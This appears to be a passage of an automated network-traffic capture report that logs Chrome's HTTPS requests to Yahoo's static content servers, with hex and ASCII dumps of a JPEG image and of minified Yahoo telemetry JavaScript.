                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:58 UTC1300INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 03 02 02 02 02 02 03 02 02 02 03 03 03 03 04 06 04 04 04 04 04 08 06 06 05 06 09 08 0a 0a 09 08 09 09 0a 0c 0f 0c 0a 0b 0e 0b 09 09 0d 11 0d 0e 0f 10 10 11 10 0a 0c 12 13 12 10 13 0f 10 10 10 ff db 00 43 01 03 03 03 04 03 04 08 04 04 08 10 0b 09 0b 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 ff c0 00 11 08 00 b4 01 64 03 01 11 00 02 11 01 03 11 01 ff c4 00 1d 00 00 02 03 01 01 01 01 01 00 00 00 00 00 00 00 00 06 07 04 05 08 03 02 01 09 00 ff c4 00 4d 10 00 01 03 02 04 04 03 05 05 03 08 06 09 05 00 00 01 02 03 04 05 11 00 06 12 21 07 13 31 41 22 51 61 14 32 71 81 91 08 15 23 42
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: JFIFCCdM!1A"Qa2q#B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:58 UTC278INData Raw: a8 4a 12 89 2d 9d ff 00 7e 25 78 3a c8 88 98 99 49 5a 5f 4d 82 4d 86 f8 90 59 4e d4 85 47 92 a4 b6 36 d5 d2 f8 e0 1b 2d 5c 50 71 a0 a4 f7 c4 a2 5f 82 8a a4 d6 b3 a2 f6 bf 7c 36 02 64 55 25 05 07 71 6c 31 3a e4 5b 5d dc 21 df c1 ef b3 5d 73 3f c4 15 ea dc e3 47 a4 ac 5d 97 14 d1 53 92 3d 50 93 b6 91 dd 46 c3 7e f8 a1 b1 bb 7c 23 47 06 95 72 c6 90 fb 3f 70 da 53 ff 00 75 e5 5a e4 ca f4 aa 7b 65 e9 a9 69 68 08 0d 25 25 4a 25 40 59 3b 24 d8 78 8e e2 e7 ca 93 d8 ca b9 45 d8 e0 c4 bc 97 b0 fe ce b9 06 b5 15 5c ba 70 65 28 8e db 8b 53 52 94 1e 6d 24 9b a9 48 57 85 5e a5 24 5a c7 6e f8 57 bf cd 11 9e 86 21 41 c6 2f b3 16 65 c8 74 df e5 5e 5e 4f de d9 68 8b 99 88 23 5b 07 c9 c1 bd c1 ec a0 48 eb 7b 62 fe bf 50 59 f8 65 0d 8d 6a 76 84 d7 dd 4a d2 0a d6 9b f9 62 dd
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: J-~%x:IZ_MMYNG6-\Pq_|6dU%ql1:[]!]s?G]S=PF~|#Gr?pSuZ{eih%%J%@Y;$xE\pe(SRm$HW^$ZnW!A/et^^Oh#[H{bPYejvJb
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:58 UTC1300INData Raw: 0c ae dd 2f 85 54 d9 32 5c e5 47 66 2a 74 36 50 2e 09 4a 4a 89 b7 4d ef 61 d8 01 b0 c6 4b 7d d9 5a 35 d7 d3 8d 04 99 4d 98 12 b2 d4 3a c7 3e 3c 66 a2 a5 28 e6 49 79 2d 26 c2 fb 24 93 b9 c5 49 c1 9b fa d2 5d a1 7e 5d cf d4 29 6b 30 e2 4a 65 f7 36 b0 6d d0 4f d3 08 ed 68 b4 da 7e 02 7a 4f 1c f2 97 b5 8a 25 61 f9 89 e5 a8 80 a6 92 08 57 d4 8c 3d 45 89 93 51 26 71 77 33 c7 91 93 5d 9f 97 ea 28 93 05 4d 27 96 a4 ec 7d e0 48 23 b7 4c 55 e7 d4 09 ab c4 7f 70 b5 aa 7e 61 e1 66 63 c9 d9 b2 7b 0a a7 57 58 4b 40 95 94 84 3f ab c1 b6 e0 1b 9b 91 6b 78 46 d8 ba 9b 4d 23 cc ed c3 86 7e 7f f1 5f 25 48 ca 39 aa 7d 1b 52 96 a8 6f 38 d9 ba 6d 70 14 40 3e 97 b5 f7 f4 c6 e6 bc af 83 22 4a 80 95 45 7b f6 71 61 48 13 f9 b5 2d b4 14 5a e0 e3 9b b2 2c bb a7 d3 9c 5b 1c f5 b0 f2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: /T2\Gf*t6P.JJMaK}Z5M:><f(Iy-&$I]~])k0Je6mOh~zO%aW=EQ&qw3](M'}H#LUp~afc{WXK@?kxFM#~_%H9}Ro8mp@>"JE{qaH-Z,[
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:58 UTC1300INData Raw: 48 e1 7b b4 4a 6b 28 d6 58 52 de 5a 56 a3 75 5b 63 65 13 6e a7 be 10 b9 95 82 e1 f4 50 a0 e1 1d 7a 5d 6b 28 bf 4f 5a 87 de 4d 38 cc e6 50 0d d4 b4 b6 af 11 03 d0 12 7e 58 b9 b0 d7 a9 c1 83 28 db 01 b8 e9 43 55 63 31 cf ae 3b a8 3f 50 09 71 2b 5a 82 c0 b2 46 db 62 f6 9c e9 19 1b 58 fe a6 c4 a3 14 7b 05 73 cd fc b6 e9 8d 0e e2 85 1c 1a a5 b6 f4 c1 11 a6 ee b5 74 c7 77 51 c6 eb fb 30 7f a3 4e a3 c4 8a 14 3c e5 c4 9c c9 27 2f 53 25 14 ad 88 ac 30 13 32 42 40 f7 bc 44 86 d3 b8 b5 c1 24 1e 83 02 be f1 2d f6 a3 5a ab fd 1f 9f 66 fa 3d 09 54 c4 44 ae 4b 9a f7 e1 b1 25 fa 89 e6 eb ec 76 48 49 f8 11 6c 77 d3 55 67 46 72 4f 9f 05 3d 67 fd 18 dc 1e 9d 44 10 29 39 b3 31 42 9a 93 ac 4a 78 b2 fa 0a bc d4 de 84 df e4 a1 f1 c3 d6 bf c9 de e7 fc 19 0b 8e 9f 64 6e 22 fd 9f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: H{Jk(XRZVu[cenPz]k(OZM8P~X(CUc1;?Pq+ZFbX{stwQ0N<'/S%02B@D$-Zf=TDK%vHIlwUgFrO=gD)91BJxdn"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:58 UTC1300INData Raw: 13 6d cd cf d7 1a ca 46 53 89 a1 3e c6 9f 67 e9 9c 45 cf 71 f3 4d 55 98 c9 a2 53 1f 08 6d c9 7b 21 e9 26 c5 29 4a 46 ee 14 8f 11 03 60 74 dc d8 e1 39 25 64 76 b6 7e b1 14 40 ca 34 d6 19 89 39 52 7d a1 69 61 bd ee e3 ee 1e aa bf e4 6c 00 54 a2 06 c1 3b 79 16 45 a8 ae 01 57 f8 23 09 d4 e6 73 1c 18 53 03 2a 5c a8 b2 a4 30 82 dd 82 6c 5a d0 54 6f ef 14 87 09 da fe 2e f6 c2 bd 4e d6 33 d3 6c b0 a3 67 28 c8 83 c9 76 69 75 a5 2f 90 db ee 1b a9 1a 80 2d 85 7c 42 91 f3 71 03 a9 c3 bd d3 48 5b d5 b7 c0 bc cd 3c 45 6e a6 f5 5b 87 59 de 97 1a 4c 47 da 53 52 23 ad 3e 15 b6 7b a4 9f ca 7c fb 5b be 2b cf 69 be 07 c7 52 f9 47 e7 a6 72 e1 fc 0c a3 9a aa 14 ea 14 d8 c8 82 cb ca 4b 6e be 35 2b 45 ee 94 fc 40 23 6f 5c 56 72 4c b7 83 5a bc 90 d1 50 a6 43 0f 46 8f 39 a6 d7 a7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: mFS>gEqMUSm{!&)JF`t9%dv~@49R}ialT;yEW#sS*\0lZTo.N3lg(viu/-|BqH[<En[YLGSR#>{|[+iRGrKn5+E@#o\VrLZPCF9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:58 UTC1300INData Raw: b5 74 92 ea 10 f2 02 81 ea b7 74 dc ef d0 f8 4f c9 47 0a 6f 2a 2d bd 64 d0 c9 6f ed 51 97 6a d2 a9 f5 d7 14 b0 f4 54 2d b5 a2 fb a8 68 28 58 4f 9a ad bd bb 9c 0f b8 97 c8 9f 6b f8 3a ca fb 48 65 07 29 d3 63 d2 ea 0b 75 99 29 52 02 92 3d d5 2b 64 5c 75 b6 c8 04 f9 a7 1d ee 19 2b 55 8a ee 28 7d a5 69 79 8a 93 4f 96 f2 1e 8d 9a 69 a7 d9 5c 7d bd d0 fb 64 58 28 a8 0d cd ba 82 0f 9f 95 a6 30 7b 03 bd bf b7 e5 99 5b 3b 71 01 f9 f5 f7 e5 49 79 e3 0d 66 f6 49 1b 9f 99 ff 00 17 c6 8c 70 70 52 d8 9f e0 17 7f 3c 48 4c 15 b8 85 a1 27 51 40 0b 51 0e 58 74 dc 6d df 0d 58 68 ac b6 28 a2 6b 3e d5 69 ee 2c 72 59 71 6b b6 a2 b4 05 03 6f 43 83 f4 0e f7 7f 01 0d 3f 3c a1 d9 01 d9 8d 36 a7 f6 01 d3 dc 92 05 80 e8 06 17 2c 34 4c 72 f7 72 31 28 3c 54 72 94 2f 21 6a 5c 62 92 80
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ttOGo*-doQjT-h(XOk:He)cu)R=+d\u+U(}iyOi\}dX(0{[;qIyfIppR<HL'Q@QXtmXh(k>i,rYqkoC?<6,4Lrr1(<Tr/!j\b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:58 UTC1300INData Raw: bb 0d bc bb 8c 23 d2 45 84 e3 e4 b1 c8 19 e3 20 4a cc 0c b1 3e 55 51 48 57 e5 2e 23 49 f8 81 d4 62 1e b5 a0 7d d6 15 c7 c8 15 c5 5c c3 4a 39 8a 5c 78 29 05 b6 ce 94 94 8b 13 bf 53 8b 5a 90 48 a1 b7 b5 f8 15 b5 dc c0 5f 6d 6e 15 dc 1d 82 41 c6 85 18 ef 61 3e 08 94 78 ef 55 64 7b 33 67 c4 6d 6d b0 2d f6 87 ad af dc 30 60 f0 b6 b5 5f 41 44 38 25 4f 25 44 29 5a 80 00 79 9b e1 0f 66 2b c9 a5 fc b5 d5 90 2b 9c 23 ce 79 78 37 38 d3 26 08 84 90 1d 65 3a c2 d7 f2 38 e5 b1 8b e4 4b e9 d9 17 80 41 e9 55 86 9e 11 e5 2d e6 9b 24 dd 4b 1f c3 0f fa 64 b8 10 d3 87 92 ee 9f 5c cc b5 29 3e cf 2e a2 eb 9c b4 a5 28 21 5d 11 bd c8 f3 b0 18 5b c6 25 4d d8 75 95 eb 0e 57 73 0c 6a 34 a5 a9 c6 d7 a4 14 be ab 24 90 6e 0d fc f0 13 8a 43 a1 2e e5 4c 7a ae 15 35 e8 81 f8 cc a5 b5 b2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: #E J>UQHW.#Ib}\J9\x)SZH_mnAa>xUd{3gmm-0`_AD8%O%D)Zyf++#yx78&e:8KAU-$Kd\)>.(!][%MuWsj4$nC.Lz5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:58 UTC1300INData Raw: 9b 66 a3 54 86 ec ac b7 45 14 b0 97 1a 64 47 58 df f0 ee 53 6f 23 7c 17 29 15 64 d1 94 7e d1 fc 14 cb ca a5 54 aa 39 6e 9a 88 f2 5b 48 72 cd fb ab 5e fb 5b b5 ed fa 62 c6 b6 cb 4e 99 5f 6b 55 6c 60 b4 63 28 4e ce 8a a7 59 6c 13 a4 80 41 ec 77 c6 f2 57 c9 e5 a5 f4 f0 c3 bc 80 d4 e1 55 4c f9 93 d2 95 b4 40 d6 a5 05 00 a3 d8 db a7 c7 15 f3 47 81 d8 25 c9 a4 f2 b9 7d 54 33 0d f4 ac 75 d2 f2 87 80 83 db 5f ba ab 5b cf be 2a 05 99 26 f8 0a 72 dc ea 35 06 22 a3 4c aa c7 71 e4 25 47 50 50 1b 5e e0 58 9f 5c 70 80 6b 32 d6 9b ac 56 a9 72 22 be cf 28 20 a8 a1 4f 27 dd d7 bd c6 38 e2 26 60 93 4f a5 47 93 4b 6a 5c 56 18 d4 95 21 2a 7d 00 a9 25 09 b1 dc f4 c1 80 0d b1 22 86 0a 4a f3 15 3d 2a 6f c4 0f 39 3b fe b8 e3 8f 15 ba f6 5e 97 21 06 2d 5e 21 b2 b4 39 f8 c9 36 42
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: fTEdGXSo#|)d~T9n[Hr^[bN_kUl`c(NYlAwWUL@G%}T3u_[*&r5"Lq%GPP^X\pk2Vr"( O'8&`OGKj\V!*}%"J=*o9;^!-^!96B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:58 UTC1300INData Raw: 90 5b 41 44 98 d5 18 45 0b 6e dd c2 c1 b1 fa 79 63 2f 62 5c f0 6b 6a 26 d7 26 5d e2 e5 30 d0 38 9f 56 83 18 16 db 53 fc d4 0f ea af 7c 6e ea bb c2 8f 39 d4 d7 6e 79 1c 29 d9 80 46 43 88 2a d5 75 92 0d ed 71 d8 e3 a4 ac af 17 43 33 86 f9 9a 74 ba 9d 32 99 31 2a 93 01 f5 6f 15 57 52 05 fb db a7 6f 2c 56 9c 68 73 e4 6e be de 5d 86 4f ff 00 4b c0 4e b1 ff 00 e2 27 fc 77 c2 c5 30 ca 87 93 72 ed 6a 22 26 0c bd 4e 09 02 c9 d3 19 3e be 98 e0 6c fb 98 32 35 22 43 ba 91 05 95 d9 3a 40 2d 8f 0a 47 40 3d 00 db 06 08 22 69 94 b8 ee 2a 9e 8a 6b 1a fa 5f 40 df f4 c7 1c 58 d0 72 aa 10 e4 96 a6 d3 19 29 79 b5 58 69 1d f1 c7 37 47 0a 8f 0c 22 c8 a6 44 5b 48 23 f0 d2 d9 1a 7c f7 bf eb 8e 00 5e d7 20 3d 4f a8 2a 24 24 25 b6 d0 90 0f 86 f7 3e 7f 4b 7d 31 c1 51 9d a1 7f d5 d1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: [ADEnyc/b\kj&&]08VS|n9ny)FC*uqC3t21*oWRo,Vhsn]OKN'w0rj"&N>l25"C:@-G@="i*k_@Xr)yXi7G"D[H#|^ =O*$$%>K}1Q
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:58 UTC1300INData Raw: 94 9b 59 20 74 f2 16 c7 1c 28 f3 03 91 45 51 d0 e4 17 16 ae ea bd af 83 a0 ec c8 50 bf a0 18 ba 25 04 14 47 8c 59 09 50 55 ac 7e a3 01 24 12 0d 42 d2 b4 25 69 e8 a1 7c 2d 84 54 56 24 34 80 7c 37 20 79 e3 91 c0 cc 85 69 41 3e 87 06 85 a3 84 54 07 23 27 58 eb db 05 4d 12 7d 44 29 12 64 22 2c 28 ee 3e f3 8a d2 86 db 49 52 94 7c 80 1d 4e 21 ca bc 86 a3 66 81 e0 7f d9 5f 30 66 fa dc 69 fc 48 62 56 5d a0 04 17 56 a4 21 06 53 d6 b5 90 86 ca 81 4d cf 55 2a c0 0b f5 24 0c 2f dc 63 5e 42 7a f9 5f 83 53 31 47 c9 34 5c a1 53 c8 34 6c b3 4f a3 41 0a 06 2d 46 3b 69 12 5a 90 d5 ca 16 b7 4f 8d 69 21 56 52 54 55 ef 92 37 c1 ed ec 69 6c 60 ff 00 25 7d 4f 7b ad 9f fc 0b fa 6e 70 ad 65 59 28 67 30 a0 e9 1e e3 cd 28 2d 0a 1e 8a 06 c7 1e 76 51 fc 1e e7 5b 61 6c aa 63 4d 6f c2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: Y t(EQP%GYPU~$B%i|-TV$4|7 yiA>T#'XM}D)d",(>IR|N!f_0fiHbV]V!SMU*$/c^Bz_S1G4\S4lOA-F;iZOi!VRTU7il`%}O{npeY(g0(-vQ[alcMo


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    68192.168.2.44983187.248.119.2524434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:58 UTC588OUTGET /aaq/fp/js/tdv2-wafer-utils.customErrorHandler.bcda778b736c3a054af62f437b536e78.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:58 UTC678INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-id-2: EJGVnM/idB7OlCxkH1dpGxntnOmvjWo1O6FxUQTrD+zPe8vRHegOOaBJlZEoJ9Evib2jvvX+cXI=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-request-id: 8GK1VQFBRCTJBKS0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Fri, 06 Sep 2024 00:12:11 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Last-Modified: Wed, 22 Nov 2023 02:30:41 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ETag: "bcda778b736c3a054af62f437b536e78"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-version-id: 4nvcVa.IxmhX7xaj3DD1aoyDc2oHnofW
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 4249
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 2135328
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:58 UTC1300INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 5f 74 79 70 65 6f 66 28 65 29 7b 72 65 74 75 72 6e 20 5f 74 79 70 65 6f 66 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 22 73 79 6d 62 6f 6c 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 3f 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 65 7d 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 26 26 65 21 3d 3d 53 79 6d 62 6f 6c 2e 70 72 6f 74 6f 74 79 70 65 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 2c 5f 74 79 70 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: "use strict";function _typeof(e){return _typeof="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},_type
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:58 UTC1300INData Raw: 77 2e 77 61 66 65 72 2c 73 3d 21 28 21 77 69 6e 64 6f 77 2e 77 61 66 65 72 7c 7c 21 77 69 6e 64 6f 77 2e 77 61 66 65 72 2e 72 65 61 64 79 29 2c 67 3d 22 22 2e 63 6f 6e 63 61 74 28 22 2f 5f 74 64 5f 61 70 69 2f 62 65 61 63 6f 6e 22 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 65 2c 22 3f 22 29 2e 63 6f 6e 63 61 74 28 69 29 2e 63 6f 6e 63 61 74 28 75 28 29 2c 22 26 73 69 74 65 3d 22 29 2e 63 6f 6e 63 61 74 28 66 2e 73 69 74 65 2c 22 26 63 6f 6e 6e 65 63 74 69 6f 6e 3d 22 29 2e 63 6f 6e 63 61 74 28 65 73 63 61 70 65 28 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 77 28 29 29 29 2c 22 26 68 61 73 57 66 3d 22 29 2e 63 6f 6e 63 61 74 28 63 2c 22 26 68 61 73 57 66 52 3d 22 29 2e 63 6f 6e 63 61 74 28 73 29 3b 76 28 67 29 2c 72 2e 5f 5f 74 65 73 74 45 72 72 6f 72 26 26
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: w.wafer,s=!(!window.wafer||!window.wafer.ready),g="".concat("/_td_api/beacon","/").concat(e,"?").concat(i).concat(u(),"&site=").concat(f.site,"&connection=").concat(escape(JSON.stringify(w())),"&hasWf=").concat(c,"&hasWfR=").concat(s);v(g),r.__testError&&
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:58 UTC1300INData Raw: 7d 2c 6d 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 28 64 3e 33 29 26 26 28 21 72 2e 6e 61 76 69 67 61 74 6f 72 7c 7c 21 31 21 3d 3d 72 2e 6e 61 76 69 67 61 74 6f 72 2e 6f 6e 4c 69 6e 65 29 26 26 65 29 7b 76 61 72 20 6e 3d 65 2e 6d 65 74 61 2c 74 3d 65 2e 6e 61 6d 65 2c 6f 3d 65 2e 73 74 61 63 6b 2c 61 3d 6f 26 26 6f 2e 6d 65 73 73 61 67 65 7c 7c 6f 7c 7c 22 22 2c 69 3d 22 2f 22 2e 63 6f 6e 63 61 74 28 66 2e 62 65 61 63 6f 6e 50 61 74 68 2c 22 3f 65 72 72 3d 22 29 2e 63 6f 6e 63 61 74 28 74 2c 22 26 62 65 61 63 6f 6e 54 79 70 65 3d 77 61 66 65 72 5f 65 72 72 26 69 6e 66 6f 3d 22 29 2e 63 6f 6e 63 61 74 28 65 73 63 61 70 65 28 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 6e 29 29 2c 22 26 73 74 61 63 6b 3d 22 29 2e 63 6f 6e 63 61 74 28 61 2c 22 26
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: },m=function(e){if(!(d>3)&&(!r.navigator||!1!==r.navigator.onLine)&&e){var n=e.meta,t=e.name,o=e.stack,a=o&&o.message||o||"",i="/".concat(f.beaconPath,"?err=").concat(t,"&beaconType=wafer_err&info=").concat(escape(JSON.stringify(n)),"&stack=").concat(a,"&
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:58 UTC349INData Raw: 63 65 73 43 72 65 61 74 6f 72 3b 72 2e 59 41 48 4f 4f 2e 75 74 69 6c 73 2e 74 72 61 63 65 73 3d 6e 2e 63 72 65 61 74 65 54 72 61 63 65 73 49 6e 73 74 61 6e 63 65 28 7b 74 72 61 63 65 73 3a 7b 67 6c 6f 62 61 6c 41 74 74 72 69 62 75 74 65 73 3a 7b 61 75 74 68 65 64 3a 4f 2e 61 75 74 68 65 64 7c 7c 22 30 22 2c 62 75 63 6b 65 74 3a 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 41 29 26 26 41 2e 6a 6f 69 6e 28 22 2c 22 29 7c 7c 41 2c 63 6f 6e 6e 65 63 74 3a 22 22 2e 63 6f 6e 63 61 74 28 65 73 63 61 70 65 28 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 77 28 29 29 29 29 2e 63 6f 6e 63 61 74 28 75 28 29 29 2c 64 65 76 69 63 65 3a 4f 2e 64 65 76 69 63 65 2c 65 6e 76 3a 4f 2e 65 6e 76 7c 7c 22 70 72 6f 64 75 63 74 69 6f 6e 22 2c 6c 61 6e 67 3a 4f 2e 6c 61 6e 67 2c 72
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: cesCreator;r.YAHOO.utils.traces=n.createTracesInstance({traces:{globalAttributes:{authed:O.authed||"0",bucket:Array.isArray(A)&&A.join(",")||A,connect:"".concat(escape(JSON.stringify(w()))).concat(u()),device:O.device,env:O.env||"production",lang:O.lang,r


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    69192.168.2.44982987.248.119.2524434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:58 UTC563OUTGET /aaq/scp/js/fpDesktop.46ec7cd52ee9f5c1236b0dea5072690a.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:58 UTC744INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-id-2: BiSEzkFPh7LCI8pn9Kc3Mr7MWuM41X9P5eIjzDlnGTHOSLzrUXwSX7NWbvE2XRbKVasjiKOkfLQ=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-request-id: 0CYWKQNMF1ETRT1X
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Sun, 29 Sep 2024 02:05:11 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 17 Sep 2024 14:42:49 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ETag: "46ec7cd52ee9f5c1236b0dea5072690a"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-version-id: EECuZaYozuD3S0mv5mnkXQno9EaB0JwF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 15774
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Vary: Origin
